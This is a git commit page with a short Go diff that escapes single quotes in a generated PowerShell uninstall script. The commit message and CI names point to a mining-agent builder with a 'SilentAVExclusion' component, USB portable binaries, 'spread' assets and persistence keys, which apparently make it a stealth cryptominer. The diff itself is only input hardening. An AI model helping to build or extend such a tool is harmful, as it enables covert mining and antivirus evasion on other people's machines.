Release validation: tests green, USB pack, fleet UX and API hardening.
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled
Fix macOS agent cross-compile (SilentAVExclusion) and Calibrate E2E nav selector; expand tests and docs; refresh portable usb binary and spread/wiki assets.
This commit is contained in:
@@ -71,8 +71,9 @@ func resolveInstallBasePS(req *BuildRequest) string {
|
||||
}
|
||||
|
||||
func generateUninstallScript(buildID string, req *BuildRequest) string {
|
||||
processName := effectiveProcessName(req)
|
||||
persistenceKey := persistenceKeyName(req)
|
||||
// Escape single quotes for PowerShell string literals ('x' → ''x'').
|
||||
processName := strings.ReplaceAll(effectiveProcessName(req), "'", "''")
|
||||
persistenceKey := strings.ReplaceAll(persistenceKeyName(req), "'", "''")
|
||||
installRel := expandInstallRelativePath(req, buildID)
|
||||
installBase := resolveInstallBasePS(req)
|
||||
|
||||
|
||||
Reference in New Issue
Block a user